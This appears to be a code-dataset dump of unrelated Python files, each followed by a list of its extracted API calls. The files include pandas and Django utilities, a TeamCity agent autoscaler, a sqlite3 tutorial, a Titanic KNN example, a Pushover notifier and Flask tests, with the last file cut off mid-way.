install_import_hook('psml')
from psml import *
right10 = modifier(lambda s: s + vector(0, 0, 10) ** s)
m = right10 ** sphere(6)
m.write()
|
[
"sys.path.append",
"typeguard.importhook.install_import_hook"
] |
[((11, 37), 'sys.path.append', 'sys.path.append', (['"""../psml"""'], {}), "('../psml')\n", (26, 37), False, 'import sys\n'), ((94, 121), 'typeguard.importhook.install_import_hook', 'install_import_hook', (['"""psml"""'], {}), "('psml')\n", (113, 121), False, 'from typeguard.importhook import install_import_hook\n')]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Utilities to summarize, validate and display DataFrames."""
# pylint: disable=invalid-name,dangerous-default-value
# pylint: disable=logging-fstring-interpolation
import pandas as pd
import pandera as pa
from IPython.display import display
from prefect import get_run_logger
def summarize_df(df: pd.DataFrame) -> None:
"""Show properties of a DataFrame."""
display(
df.dtypes.rename("dtype")
.to_frame()
.merge(
df.isna().sum().rename("num_missing").to_frame(),
left_index=True,
right_index=True,
how="left",
)
.assign(num=len(df))
.merge(
df.nunique().rename("nunique").to_frame(),
left_index=True,
right_index=True,
how="left",
)
.merge(
df.dropna(how="any")
.sample(1)
.squeeze()
.rename("single_non_nan_value")
.to_frame(),
left_index=True,
right_index=True,
how="left",
)
)
def log_prefect(
msg: str, start: bool = True, use_prefect: bool = False
) -> None:
"""Logging with Prefect."""
    if use_prefect:
        logger = get_run_logger()
        logger.info(msg)
    else:
        print(msg)
def pandera_validate_data(
df: pd.DataFrame,
schema: pa.DataFrameSchema,
ds_name: str,
use_prefect: bool = False,
) -> None:
"""Manually validate a DataFrame using a pandera DataFrameSchema."""
log_prefect(f"Validating {ds_name}...", True, use_prefect)
schema_cols = list(schema.columns)
try:
schema(df[schema_cols])
if not use_prefect:
print(f"Validated {ds_name} data")
except pa.errors.SchemaError as e:
print(f"Could not validate {ds_name} data\n{str(e)}")
log_prefect(f"Done validating {ds_name}.", False, use_prefect)
def save_data_to_parquet_file(
df: pd.DataFrame, filepath: str = "data/raw/myfile.parquet.gzip"
) -> None:
"""Export DataFrame to a parquet file."""
df.to_parquet(filepath, index=False, engine="auto")
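

if __name__ == "__main__":
    # Minimal illustrative check (added for this example; not part of the
    # original module): validate a tiny DataFrame against a one-column
    # pandera schema using the helper above.
    _df = pd.DataFrame({"a": [1, 2, 3]})
    _schema = pa.DataFrameSchema({"a": pa.Column(int)})
    pandera_validate_data(_df, _schema, "demo")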
|
[
"prefect.get_run_logger"
] |
[((1293, 1309), 'prefect.get_run_logger', 'get_run_logger', ([], {}), '()\n', (1307, 1309), False, 'from prefect import get_run_logger\n')]
|
import datetime
from django.db import models
from django.core.exceptions import ValidationError
'''
Goal: a custom Django field that accepts input with different levels of date
specificity, ranging from a specific day to a millennium. Creating a custom
field keeps data entry and the database structure simple compared to using
multiple fields.
Solution: create a date mapper class (a custom Django field is based on a
Python class). This class maps a string input to a datetime instance;
following the partial-date repository, we use the microseconds to store the
specificity of the date.
'''
format_help = '''
The input string has the following format:
(format)
day 1999-12-04 Y-M-D
month 1999-12 Y-M
year 1999y <integer>y
decade 200d <integer>d 1990-2000
century 20c <integer>c 1900-2000
millenium 2m <integer>m 1000-2000
For December fourth, 1999 you type: 1999-12-04
Alternative formats
(format) (Alternative format)
2c 2nd century
4m 4th millenium
1999y 1999
1999-01 January 1999
1999-01-31 January 31, 1999
'''
class PartialDate:
'''A class to map between a string and datetime object for a custom django field that can store partial dates.'''
def __init__(self,s = None, t = None):
        '''Object that maps between a string and a datetime object.
        s    specially formatted string (see format_help) that specifies a date
        t    datetime object with the precision stored in the microseconds
'''
self.s = s
self.format_help = format_help
self.format_error = ValueError('input string does not conform to format "'
+ str(self.s) + '"\n' + self.format_help)
self.type_dict = {'y':'year','d':'decade','c':'century','m':'millenium',
'ym':'year_month','ymd':'year_month_day'}
self.type2number_dict = {'year':0,'decade':1,'century':2,'millenium':3,
'year_month':4,'year_month_day':5}
self.number2type_dict = reverse_dict(self.type2number_dict)
self.type2multiplier = {'decade':10,'century':100,'millenium':1000}
self.month_dict = dict([[datetime.datetime(2020, i,1).strftime('%B'),i] for i in range(1,13)])
if s == None and t == None: raise ValueError('please provide string or datetime object')
if s:
self.determine_type()
self._set_datetime()
        else: self.set_datetime_from_database(t)
def __str__(self):
return self.pretty_string()
def __repr__(self):
return str(self.start_dt) + ' ' + str(self.end_dt)
def __lt__(self,other):
if type(other) == float: return self.dt < datetime.datetime.fromtimestamp(other)
elif type(other) == datetime.datetime: return self.dt < other
elif not type(self) == type(other):
raise ValueError('cannot compare with ' + str(type(other)) + ' ' + other)
return self.dt < other.dt
def __contains__(self,other):
'''checks whether the other time is within the self time.'''
if type(other) == float:
start_dt = datetime.datetime.fromtimestamp(other)
end_dt = start_dt
elif type(self) == type(other): start_dt, end_dt = other.start_dt,other.end_dt
        elif type(other) == datetime.datetime: start_dt, end_dt = other, other
else: raise ValueError('cannot compare with ' + str(type(other)) + ' ' + other)
return self.start_dt <= start_dt and self.end_dt >= end_dt
def __eq__(self,other):
if type(self) == type(other):
return self.dt == other.dt
return False
def determine_type(self):
'''based on the string format the level of date specificity is determined.'''
self.year, self.month, self.day = 1,1,1
if self.s == '': raise self.format_error
elif check_month(self.s):
self.month = self.month_dict[check_month(self.s)]
self.year = int(self.s.split(' ')[-1])
if self.s.count(' ') == 2:
self.day = int(self.s.split(' ')[1].strip(','))
self.type = 'year_month_day'
else: self.type = 'year_month'
elif check_year(self.s):
self.type = 'year'
self.number = check_year(self.s)
self.year = self.number
elif check_decade_century_milenium(self.s):
self.type = check_decade_century_milenium(self.s)
self.number = extract_number_from_count_string(self.s)
elif self.s[-1] in self.type_dict.keys():
try: setattr(self,self.type_dict[self.s[-1]],int(self.s[:-1]))
except: raise self.format_error
else:
self.type = self.type_dict[self.s[-1]]
self.number = int(self.s[:-1])
elif self.s.count('-') == 1:
try: self.year, self.month = [int(s) for s in self.s.split('-')]
except: raise self.format_error
else:self.type = 'year_month'
elif self.s.count('-') == 2:
try: self.year, self.month,self.day = [int(s) for s in self.s.split('-')]
except: raise self.format_error
else:self.type = 'year_month_day'
else: raise self.format_error
def _set_datetime(self):
'''create the datetime object. dt, start_dt end_dt (dt == start_dt)
start / end dt refer to the start /end point of a date,
for example 2nd century (2c) start_date = 100-01-01, end_date = 0199-12-31
the start date is stored in the database
'''
if self.type in 'decade,century,millenium'.split(','):
self.end_year = self.number * self.type2multiplier[self.type] - 1
self.year = self.end_year + 1 - self.type2multiplier[self.type]
if self.year == 0: self.year =1
self.dt = datetime.datetime(year=self.year,month=1,day=1,microsecond = self.type2number_dict[self.type])
self.start_dt = self.dt
self.end_dt = datetime.datetime(year=self.end_year,month=12,day=31,microsecond = self.type2number_dict[self.type])
else:
self.dt = datetime.datetime(year=self.year,month=self.month,day=self.day,microsecond = self.type2number_dict[self.type])
self.start_dt = self.dt
if self.type == 'year': self.month, self.day =12,31
if self.type == 'year_month': self.day = month2endday(self.year,self.month)
self.end_dt = datetime.datetime(year=self.year,month=self.month,day=self.day,
microsecond=self.type2number_dict[self.type])
    def set_datetime_from_database(self, dt):
        '''Create a partial date object from a datetime object (microseconds indicate the precision).'''
self.dt = dt
self.start_dt = self.dt
self._datetime2str()
self._set_datetime()
def _datetime2str(self):
'''Create the string representation based on datetime object.'''
self.type = self.number2type_dict[self.dt.microsecond]
self.year = self.dt.year
self.month = self.dt.month
self.day = self.dt.day
if self.type in 'decade,century,millenium'.split(','):
n = self.type2multiplier[self.type]
self.number = int((self.year+n)/n)
self.s = str(self.number) + reverse_dict(self.type_dict)[self.type]
elif self.type == 'year': self.s = self.dt.strftime('%Y')
elif self.type == 'year_month': self.s = self.dt.strftime('%Y-%m')
elif self.type == 'year_month_day': self.s = self.dt.strftime('%Y-%m-%d')
else: raise ValueError('do not recognize type:',self.type)
def pretty_string(self):
'''Create nice format for the date (e.g. 2nd century).'''
if self.type in 'decade,century,millenium'.split(','):
return make_count_string(self.number) + ' ' + self.type
if self.type == 'year': s='%Y'
if self.type == 'year_month': s='%B %Y'
if self.type == 'year_month_day': s='%B %d, %Y'
return self.dt.strftime(s)
@property
def name(self):
return self.s
@property
def help(self):
print(self.format_help)
class PartialDateField(models.Field):
'''Custom django field to store date information with different levels of specificity.'''
def get_internal_type(self):
return "DateTimeField"
def from_db_value(self, value, expression, connection, context = None):
if value is None: return value
if isinstance(value, PartialDate): return value
return PartialDate(t = value)
def to_python(self, value):
if value is None: return value
if isinstance(value, PartialDate): return value
if isinstance(value, str): return PartialDate(value)
        raise ValidationError('could not parse: ' + value)
def get_prep_value(self,value):
if value is None or value == '': return None
partial_date = self.to_python(value)
return partial_date.dt
def make_count_string(n):
'''Create the correct abbreviation for a date (2nd or 4th) for 2nd or 4th century).'''
if n == 0 or int(str(n)[-1]) > 3 or int(str(n)[-1]) == 0: return str(n)+'th'
if str(n)[-1] == '1': return str(n)+'st'
if str(n)[-1] == '2': return str(n)+'nd'
if str(n)[-1] == '3': return str(n)+'rd'
raise ValueError('could not parse',n)
def extract_number_from_count_string(s):
for abbrev in 'th,st,nd,rd'.split(','):
if abbrev in s: return int(s.split(abbrev)[0])
raise ValueError('could not extract number from ' +s)
def check_month(s):
months = [datetime.datetime(2020, i,1).strftime('%B') for i in range(1,13)]
for month in months:
if month.lower() in s.lower(): return month
return False
def check_year(s):
try: return int(s)
except: return False
def check_decade_century_milenium(s):
for n in 'decade,century,millenium'.split(','):
if n in s: return n
return False
def month2endday(year, month):
# deal with leap years for february
if month == 2:
if year % 4 == 0:
if year % 100 == 0:
if year % 400 == 0: return 29
return 28
return 29
return 28
# deal with the short months
if month in [4,6,9,11]: return 30
# the rest
return 31
def reverse_dict(d):
'''Swap keys and values does not check whether original values are unique.'''
return {v:k for k, v in d.items()}
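

if __name__ == '__main__':
    # Illustrative round trip (added for this example; not part of the
    # original module): parse a partial date string, then print its pretty
    # form and its start/end datetime bounds.
    pdate = PartialDate('2c')
    print(pdate)        # 2nd century
    print(repr(pdate))  # start and end datetimes spanning the 2nd century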
|
[
"datetime.datetime",
"datetime.datetime.fromtimestamp"
] |
[((2888, 2926), 'datetime.datetime.fromtimestamp', 'datetime.datetime.fromtimestamp', (['other'], {}), '(other)\n', (2919, 2926), False, 'import datetime\n'), ((5216, 5316), 'datetime.datetime', 'datetime.datetime', ([], {'year': 'self.year', 'month': '(1)', 'day': '(1)', 'microsecond': 'self.type2number_dict[self.type]'}), '(year=self.year, month=1, day=1, microsecond=self.\n type2number_dict[self.type])\n', (5233, 5316), False, 'import datetime\n'), ((5355, 5461), 'datetime.datetime', 'datetime.datetime', ([], {'year': 'self.end_year', 'month': '(12)', 'day': '(31)', 'microsecond': 'self.type2number_dict[self.type]'}), '(year=self.end_year, month=12, day=31, microsecond=self.\n type2number_dict[self.type])\n', (5372, 5461), False, 'import datetime\n'), ((5477, 5592), 'datetime.datetime', 'datetime.datetime', ([], {'year': 'self.year', 'month': 'self.month', 'day': 'self.day', 'microsecond': 'self.type2number_dict[self.type]'}), '(year=self.year, month=self.month, day=self.day,\n microsecond=self.type2number_dict[self.type])\n', (5494, 5592), False, 'import datetime\n'), ((5766, 5881), 'datetime.datetime', 'datetime.datetime', ([], {'year': 'self.year', 'month': 'self.month', 'day': 'self.day', 'microsecond': 'self.type2number_dict[self.type]'}), '(year=self.year, month=self.month, day=self.day,\n microsecond=self.type2number_dict[self.type])\n', (5783, 5881), False, 'import datetime\n'), ((2505, 2543), 'datetime.datetime.fromtimestamp', 'datetime.datetime.fromtimestamp', (['other'], {}), '(other)\n', (2536, 2543), False, 'import datetime\n'), ((8610, 8639), 'datetime.datetime', 'datetime.datetime', (['(2020)', 'i', '(1)'], {}), '(2020, i, 1)\n', (8627, 8639), False, 'import datetime\n'), ((2048, 2077), 'datetime.datetime', 'datetime.datetime', (['(2020)', 'i', '(1)'], {}), '(2020, i, 1)\n', (2065, 2077), False, 'import datetime\n')]
|
import os
import time
import logging
import argparse
from datetime import datetime, timedelta, timezone
import requests
log = logging.getLogger(__name__)
dead_disconnected_timeout = timedelta(minutes=5)
# TODO: add schedule
def main():
arg_parser = argparse.ArgumentParser()
arg_parser.add_argument('--base-url', required=True)
arg_parser.add_argument('--auth-token', required=True)
arg_parser.add_argument('--cloud-profile-id', required=True)
arg_parser.add_argument('--min-idle-agents', type=int, default=1)
arg_parser.add_argument('--watch-interval-sec', type=int, default=60)
arg_parser.add_argument('--log-level', default='INFO')
args = arg_parser.parse_args()
logging.basicConfig(format='%(message)s', level=args.log_level.upper())
log.info('Base URL: %s', args.base_url)
if args.auth_token.startswith('$'):
args.auth_token = os.environ[args.auth_token[1:]]
s = requests.Session()
s.headers['Accept'] = 'application/json'
s.headers['Authorization'] = f'Bearer {args.auth_token}'
# Test connection
resp = s.get(f'{args.base_url}app/rest/server')
resp.raise_for_status()
while True:
request_fields = 'id,name,connected,enabled,idleSinceTime,lastActivityTime'
resp = s.get(f'{args.base_url}app/rest/agents?fields=agent({request_fields})')
resp.raise_for_status()
agents = resp.json()
idle_agents = [a for a in agents['agent'] if a['enabled'] and a.get('idleSinceTime')]
alive_idle_agents = [a for a in idle_agents if is_alive(a)]
resp = s.get(f'{args.base_url}app/rest/cloud/instances')
resp.raise_for_status()
cloud_instances = resp.json()
scheduled_agents_count = sum(1 for i in cloud_instances['cloudInstance'] if i['state'] == 'scheduled_to_start')
log.info('Agents: %d idle (%d alive), %d pending. Target: %d',
len(idle_agents),
len(alive_idle_agents),
scheduled_agents_count,
args.min_idle_agents)
agents_to_start = args.min_idle_agents - len(alive_idle_agents) - scheduled_agents_count
if agents_to_start > 0:
log.info('Starting %d agents', agents_to_start)
for _ in range(agents_to_start):
s.cookies.clear() # clear session cookies to fix CSRF error
log.debug('Starting cloud instance with profile ID "%s"', args.cloud_profile_id)
resp = s.post(f'{args.base_url}app/rest/cloud/instances', json={
'image': {
'id': f'profileId:{args.cloud_profile_id}',
},
})
resp.raise_for_status()
log.debug('Sleeping %d seconds', args.watch_interval_sec)
time.sleep(args.watch_interval_sec)
def is_alive(agent):
if agent['connected']:
return True
last_activity_time = datetime.strptime(agent['lastActivityTime'], '%Y%m%dT%H%M%S%z')
now = datetime.now(timezone.utc)
disconnected_for = now - last_activity_time
is_dead = disconnected_for > dead_disconnected_timeout
return not is_dead
if __name__ == '__main__':
main()
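
# Example invocation (illustrative values only; the script name and all
# arguments below are assumptions, not taken from the original source):
#
#   python agent_autoscaler.py \
#       --base-url https://teamcity.example.com/ \
#       --auth-token '$TEAMCITY_TOKEN' \
#       --cloud-profile-id myCloudProfile \
#       --min-idle-agents 2 --watch-interval-sec 30
#
# A token of the form '$NAME' makes the script read the real token from the
# NAME environment variable, per main() above.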
|
[
"argparse.ArgumentParser",
"requests.Session",
"time.sleep",
"datetime.datetime.strptime",
"datetime.timedelta",
"datetime.datetime.now",
"logging.getLogger"
] |
[((128, 155), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (145, 155), False, 'import logging\n'), ((184, 204), 'datetime.timedelta', 'timedelta', ([], {'minutes': '(5)'}), '(minutes=5)\n', (193, 204), False, 'from datetime import datetime, timedelta, timezone\n'), ((258, 283), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (281, 283), False, 'import argparse\n'), ((933, 951), 'requests.Session', 'requests.Session', ([], {}), '()\n', (949, 951), False, 'import requests\n'), ((2933, 2996), 'datetime.datetime.strptime', 'datetime.strptime', (["agent['lastActivityTime']", '"""%Y%m%dT%H%M%S%z"""'], {}), "(agent['lastActivityTime'], '%Y%m%dT%H%M%S%z')\n", (2950, 2996), False, 'from datetime import datetime, timedelta, timezone\n'), ((3007, 3033), 'datetime.datetime.now', 'datetime.now', (['timezone.utc'], {}), '(timezone.utc)\n', (3019, 3033), False, 'from datetime import datetime, timedelta, timezone\n'), ((2802, 2837), 'time.sleep', 'time.sleep', (['args.watch_interval_sec'], {}), '(args.watch_interval_sec)\n', (2812, 2837), False, 'import time\n')]
|
import webapp2
import config
import app.handlers.home
ROUTES = []
ROUTES += app.handlers.home.ROUTES
app = webapp2.WSGIApplication(ROUTES, debug=config.DEBUG)
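
if __name__ == '__main__':
    # Hypothetical local-dev entry point (added for illustration; not in the
    # original file), following the webapp2 quickstart recipe of serving the
    # WSGI app with paste's httpserver.
    from paste import httpserver
    httpserver.serve(app, host='127.0.0.1', port='8080')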
|
[
"webapp2.WSGIApplication"
] |
[((110, 161), 'webapp2.WSGIApplication', 'webapp2.WSGIApplication', (['ROUTES'], {'debug': 'config.DEBUG'}), '(ROUTES, debug=config.DEBUG)\n', (133, 161), False, 'import webapp2\n')]
|
"""
Example code for working with sqlite3 to manage the database.
This file is mostly for Ted but if anyone else needs an example for
understanding the database code, this is a good resource.
Here is the official Python guide as well:
https://docs.python.org/3/library/sqlite3.html
You can also look up sqlit3 tutorials and tons will come up (such as
the one from tutorialspoint).
"""
# This is how you import sqlite3
import sqlite3
# This is the relative filename to the database. Relative file name
# means the path from the current directory. Don't put something like:
# C:\\Users\\blahblahblah\\..., that would be an absolute path.
database_file = "DB_FILENAME.db"
# This command creates the CONNECTED_DATABASE_OBJECT_NAME object from
# the README_FOR_TED file. This object is used to interact with the
# database.
conn = sqlite3.connect(database_file)
# This creates what's called a cursor object which essentially points
# to the database and allows you to execute SQL commands on it. This is
# the "wrapper" for the Python code to interact with SQLite (the database
# management system).
c = conn.cursor()
# These are example variables that can be used in the safe insertion
# logic below.
msg_txt = "What time is it?"
action = "TIME"
# This command is how you execute SQL commands in sqlite3. The example
# command here is inserting data into a table in the database called
# training_data in the columns "txt" and "action". The (?, ?) part
# might look a little scary but all it's actually doing is safely
# inserting whatever is passed into the second argument: a tuple ->
# (msg_txt, action,). This helps to avoid things like SQL injection and
# accidentally altering the wrong things in the database. Notice the
# trailing comma in the tuple. For a two-element tuple like this one the
# comma is optional, but for a one-element tuple such as (msg_txt,) it is
# required; without it, Python treats (msg_txt) as a plain parenthesized
# expression, which can lead to errors that are tricky to spot.
c.execute("INSERT INTO training_data (txt,action) VALUES (?, ?)", (msg_txt, action,))
# This command "commits" the changes and makes them permanent.
conn.commit()
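
# Hypothetical follow-up (not in the original walkthrough): read the row back
# with another parameterized query to confirm the insert, then close the
# connection so the database file handle is released.
c.execute("SELECT txt, action FROM training_data WHERE action = ?", (action,))
print(c.fetchall())
conn.close()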
|
[
"sqlite3.connect"
] |
[((864, 894), 'sqlite3.connect', 'sqlite3.connect', (['database_file'], {}), '(database_file)\n', (879, 894), False, 'import sqlite3\n')]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Aug 13 22:37:36 2020
@author: arti
"""
import pandas as pd
df = pd.read_csv('./titanic.csv')
print(df.head())
print('--')
pd.set_option('display.max_columns', 15)
print(df.head())
print('--')
print(df.info())
print('--')
rdf = df.drop(['deck', 'embark_town'], axis = 1)
print(rdf.columns.values)
rdf = rdf.dropna(subset=['age'], how='any', axis=0)
print(len(rdf))
most_freq = rdf['embarked'].value_counts(dropna=True).idxmax()
print(most_freq)
print('--')
print(rdf.describe(include='all'))
print('--')
rdf['embarked'].fillna(most_freq, inplace=True)
ndf = rdf[['survived', 'pclass', 'sex', 'age', 'sibsp', 'parch', 'embarked']]
print(ndf.head())
onehot_sex = pd.get_dummies(ndf['sex'])
ndf = pd.concat([ndf, onehot_sex], axis=1)
onehot_embarked = pd.get_dummies(ndf['embarked'], prefix='town')
ndf = pd.concat([ndf, onehot_embarked], axis=1)
ndf.drop(['sex', 'embarked'], axis=1, inplace=True)
print(ndf.head())
x = ndf[['pclass', 'age', 'sibsp', 'parch', 'female', 'male',
'town_C', 'town_Q', 'town_S']]
y = ndf['survived']
from sklearn import preprocessing
x = preprocessing.StandardScaler().fit(x).transform(x)
from sklearn.model_selection import train_test_split
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.3,
random_state=10)
print('train data :', x_train.shape)
print('test data :', x_test.shape)
from sklearn.neighbors import KNeighborsClassifier
knn = KNeighborsClassifier(n_neighbors=5)
knn.fit(x_train, y_train)
y_hat = knn.predict(x_test)
print(y_hat[0:10])
print(y_test.values[0:10])
from sklearn import metrics
knn_matrix = metrics.confusion_matrix(y_test, y_hat)
print(knn_matrix)
knn_report = metrics.classification_report(y_test, y_hat)
print(knn_report)
|
[
"sklearn.preprocessing.StandardScaler",
"pandas.read_csv",
"pandas.get_dummies",
"sklearn.model_selection.train_test_split",
"sklearn.metrics.classification_report",
"sklearn.neighbors.KNeighborsClassifier",
"sklearn.metrics.confusion_matrix",
"pandas.set_option",
"pandas.concat"
] |
[((133, 161), 'pandas.read_csv', 'pd.read_csv', (['"""./titanic.csv"""'], {}), "('./titanic.csv')\n", (144, 161), True, 'import pandas as pd\n'), ((193, 233), 'pandas.set_option', 'pd.set_option', (['"""display.max_columns"""', '(15)'], {}), "('display.max_columns', 15)\n", (206, 233), True, 'import pandas as pd\n'), ((739, 765), 'pandas.get_dummies', 'pd.get_dummies', (["ndf['sex']"], {}), "(ndf['sex'])\n", (753, 765), True, 'import pandas as pd\n'), ((772, 808), 'pandas.concat', 'pd.concat', (['[ndf, onehot_sex]'], {'axis': '(1)'}), '([ndf, onehot_sex], axis=1)\n', (781, 808), True, 'import pandas as pd\n'), ((828, 874), 'pandas.get_dummies', 'pd.get_dummies', (["ndf['embarked']"], {'prefix': '"""town"""'}), "(ndf['embarked'], prefix='town')\n", (842, 874), True, 'import pandas as pd\n'), ((881, 922), 'pandas.concat', 'pd.concat', (['[ndf, onehot_embarked]'], {'axis': '(1)'}), '([ndf, onehot_embarked], axis=1)\n', (890, 922), True, 'import pandas as pd\n'), ((1296, 1350), 'sklearn.model_selection.train_test_split', 'train_test_split', (['x', 'y'], {'test_size': '(0.3)', 'random_state': '(10)'}), '(x, y, test_size=0.3, random_state=10)\n', (1312, 1350), False, 'from sklearn.model_selection import train_test_split\n'), ((1535, 1570), 'sklearn.neighbors.KNeighborsClassifier', 'KNeighborsClassifier', ([], {'n_neighbors': '(5)'}), '(n_neighbors=5)\n', (1555, 1570), False, 'from sklearn.neighbors import KNeighborsClassifier\n'), ((1715, 1754), 'sklearn.metrics.confusion_matrix', 'metrics.confusion_matrix', (['y_test', 'y_hat'], {}), '(y_test, y_hat)\n', (1739, 1754), False, 'from sklearn import metrics\n'), ((1787, 1831), 'sklearn.metrics.classification_report', 'metrics.classification_report', (['y_test', 'y_hat'], {}), '(y_test, y_hat)\n', (1816, 1831), False, 'from sklearn import metrics\n'), ((1156, 1186), 'sklearn.preprocessing.StandardScaler', 'preprocessing.StandardScaler', ([], {}), '()\n', (1184, 1186), False, 'from sklearn import preprocessing\n')]
|
import os
import argparse
import requests
def main():
parser = argparse.ArgumentParser(description="Pushover Notifications")
parser.add_argument('--message',
type=str,
help='Message text')
parser.add_argument('--status',
type=str,
help='The current status of the job')
parser.add_argument('--title',
type=str,
help='Message title')
parser.add_argument('--url',
type=str,
help='Supplementary URL to show with your message')
parser.add_argument('--url_title',
type=str,
help='title for your supplementary URL, otherwise just the URL is shown')
parser.add_argument('--device',
type=str,
help='Device name to send the message directly to')
args = parser.parse_args()
try:
token = os.environ['PUSHOVER_TOKEN']
user = os.environ['PUSHOVER_USER']
gh_server_url = os.environ['GITHUB_SERVER_URL']
gh_repo = os.environ['GITHUB_REPOSITORY']
gh_run_id = os.environ['GITHUB_RUN_ID']
gh_actor = os.environ['GITHUB_ACTOR']
gh_job = os.environ['GITHUB_JOB']
repo = 'Repo: ' + gh_repo
sha = 'Commit: ' + os.environ['GITHUB_SHA'][:8]
ref = 'Ref: ' + os.environ['GITHUB_REF'] if 'GITHUB_REF' in os.environ else ''
actor = 'Actor: ' + gh_actor
job = 'Job: ' + gh_job
workflow_url = 'Url: ' + gh_server_url + '/' + gh_repo + '/' + 'actions' + '/' + 'runs' + '/' + gh_run_id
status = 'Status: ' + args.status if args.status else ''
message = args.message if args.message else ''
message = '\n'.join([m for m in [repo, actor, sha, ref, status, job, workflow_url, message] if m])
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
payload = {
'token' : token,
'user' : user,
'message' : message,
'title' : args.title,
'url' : args.url,
'url_title' : args.url_title,
'device' : args.device,
}
response = requests.post('https://api.pushover.net/1/messages.json',
headers=headers,
data=payload,
timeout=60)
response.raise_for_status()
print(response.text)
except requests.exceptions.RequestException as e:
raise e
if __name__ == '__main__':
main()
|
[
"requests.post",
"argparse.ArgumentParser"
] |
[((69, 130), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Pushover Notifications"""'}), "(description='Pushover Notifications')\n", (92, 130), False, 'import argparse\n'), ((2340, 2444), 'requests.post', 'requests.post', (['"""https://api.pushover.net/1/messages.json"""'], {'headers': 'headers', 'data': 'payload', 'timeout': '(60)'}), "('https://api.pushover.net/1/messages.json', headers=headers,\n data=payload, timeout=60)\n", (2353, 2444), False, 'import requests\n')]
|
# -*- coding: utf-8 -*-
#
# Unless explicitly stated otherwise all files in this repository are licensed
# under the Apache 2 License.
#
# This product includes software developed at Datadog
# (https://www.datadoghq.com/).
#
# Copyright 2018 Datadog, Inc.
#
from app import db
from app.services import SubscribedListService
from app.models import SubscribedList
from tests.base_test_case import BaseTestCase
from tests.utils import create_board, create_repo, create_list, \
create_subscription, default_board_id, default_repo_id, default_list_id
class SubscribedListServiceTestCase(BaseTestCase):
"""Tests the `SubscribedListService` service."""
def setUp(self):
"""Sets up testing context."""
super().setUp()
self.subscribed_list_service = SubscribedListService()
create_board()
create_repo()
create_list()
create_subscription()
db.session.commit()
def test_create(self):
"""Test that an subscribed_list is successfully created."""
subscribed_lists = SubscribedList.query.all()
        self.assertTrue(len(subscribed_lists) == 0)
# Create the subscribed_list
self.subscribed_list_service.create(
board_id=default_board_id,
repo_id=default_repo_id,
list_id=default_list_id,
)
new_subscribed_lists = SubscribedList.query.all()
        self.assertTrue(len(new_subscribed_lists) == 1)
def test_update(self):
"""Test that a subscribed_list is successfully updated."""
self.test_create()
primary_key = [default_board_id, default_repo_id, default_list_id]
subscribed_list = SubscribedList.query.get(primary_key)
self.assertTrue(subscribed_list.trello_member_id is None)
new_member_id = '<PASSWORD>uuid'
self.subscribed_list_service.update(
board_id=default_board_id,
repo_id=default_repo_id,
list_id=default_list_id,
trello_member_id=new_member_id
)
updated_list = SubscribedList.query.get(primary_key)
self.assertTrue(updated_list.trello_member_id == new_member_id)
def test_delete(self):
"""Test that an subscribed_list is successfully deleted."""
self.test_create()
subscribed_lists = SubscribedList.query.all()
        self.assertTrue(len(subscribed_lists) == 1)
# Delete the subscribed_list
self.subscribed_list_service.delete(
board_id=default_board_id,
repo_id=default_repo_id,
list_id=default_list_id
)
new_subscribed_lists = SubscribedList.query.all()
        self.assertTrue(len(new_subscribed_lists) == 0)
|
[
"tests.utils.create_board",
"app.models.SubscribedList.query.get",
"tests.utils.create_repo",
"app.services.SubscribedListService",
"app.db.session.commit",
"tests.utils.create_list",
"tests.utils.create_subscription",
"app.models.SubscribedList.query.all"
] |
[((782, 805), 'app.services.SubscribedListService', 'SubscribedListService', ([], {}), '()\n', (803, 805), False, 'from app.services import SubscribedListService\n'), ((814, 828), 'tests.utils.create_board', 'create_board', ([], {}), '()\n', (826, 828), False, 'from tests.utils import create_board, create_repo, create_list, create_subscription, default_board_id, default_repo_id, default_list_id\n'), ((837, 850), 'tests.utils.create_repo', 'create_repo', ([], {}), '()\n', (848, 850), False, 'from tests.utils import create_board, create_repo, create_list, create_subscription, default_board_id, default_repo_id, default_list_id\n'), ((859, 872), 'tests.utils.create_list', 'create_list', ([], {}), '()\n', (870, 872), False, 'from tests.utils import create_board, create_repo, create_list, create_subscription, default_board_id, default_repo_id, default_list_id\n'), ((881, 902), 'tests.utils.create_subscription', 'create_subscription', ([], {}), '()\n', (900, 902), False, 'from tests.utils import create_board, create_repo, create_list, create_subscription, default_board_id, default_repo_id, default_list_id\n'), ((911, 930), 'app.db.session.commit', 'db.session.commit', ([], {}), '()\n', (928, 930), False, 'from app import db\n'), ((1054, 1080), 'app.models.SubscribedList.query.all', 'SubscribedList.query.all', ([], {}), '()\n', (1078, 1080), False, 'from app.models import SubscribedList\n'), ((1371, 1397), 'app.models.SubscribedList.query.all', 'SubscribedList.query.all', ([], {}), '()\n', (1395, 1397), False, 'from app.models import SubscribedList\n'), ((1679, 1716), 'app.models.SubscribedList.query.get', 'SubscribedList.query.get', (['primary_key'], {}), '(primary_key)\n', (1703, 1716), False, 'from app.models import SubscribedList\n'), ((2060, 2097), 'app.models.SubscribedList.query.get', 'SubscribedList.query.get', (['primary_key'], {}), '(primary_key)\n', (2084, 2097), False, 'from app.models import SubscribedList\n'), ((2321, 2347), 'app.models.SubscribedList.query.all', 'SubscribedList.query.all', ([], {}), '()\n', (2345, 2347), False, 'from app.models import SubscribedList\n'), ((2637, 2663), 'app.models.SubscribedList.query.all', 'SubscribedList.query.all', ([], {}), '()\n', (2661, 2663), False, 'from app.models import SubscribedList\n')]
|
from django.conf.urls import include, url
from django.contrib import admin
from rest_framework import routers
from api import views as v
router = routers.DefaultRouter()
router.register(r'conf', v.ConfViewSet)
router.register(r'country', v.CountryViewSet)
router.register(r'db', v.DbViewSet)
router.register(r'install', v.InstallViewSet)
router.register(r'ip', v.IpViewSet)
router.register(r'project', v.ProjectViewSet)
router.register(r'provider', v.ProviderViewSet)
router.register(r'server', v.ServerViewSet)
router.register(r'user', v.UserViewSet)
admin.site.site_header = 'Control Panel'
urlpatterns = [
url(r'^admin/', include(admin.site.urls)),
url(r'^api/', include(router.urls)),
url(r'^api/postfix/(?P<server_id>\d+)/$', v.PostfixItem.as_view()),
url(r'^api/project-list/(?P<type>.+)/$', v.ProjectListByType.as_view()),
